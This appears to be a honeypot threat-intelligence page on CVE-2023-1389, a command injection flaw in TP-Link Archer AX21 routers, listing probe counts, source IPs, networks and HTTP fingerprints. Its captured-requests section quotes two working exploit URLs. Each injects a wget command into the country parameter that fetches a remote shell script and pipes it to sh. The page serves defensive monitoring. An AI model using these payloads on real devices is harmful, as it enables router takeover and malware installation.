CVE-2023-1389: TP-Link Archer AX21 (AX1800) - Unauthenticated Command Injection

HoneyLabs honeypots recorded 27 probes matching CVE-2023-1389 from 2 distinct source IP addresses in the last 7 days. Severity is rated critical.

This CVE is on CISA's Known Exploited Vulnerabilities list.

Request paths that identify it

  • /cgi-bin/luci/;stok=/locale?form=country

Addresses probing it

Source IPProbesNetworkCountry
89.42.231.20025Amarutu Technology LtdThe Netherlands
221.159.119.62Korea TelecomSouth Korea

Networks it comes from

ASNOrganisationProbesSource IPs
AS206264Amarutu Technology Ltd251
AS4766Korea Telecom21

Captured requests

  • /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F162.249.125.145%2Fooo.sh+-O-+|+sh%60)
  • /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh)

HTTP client fingerprints (JA4H)

  • ge11nn0200_3ed38b250d3d
  • ge11nn0100_4740ae6347b0

CVE report

CVE report

Open a specific CVE from the CVE tracker.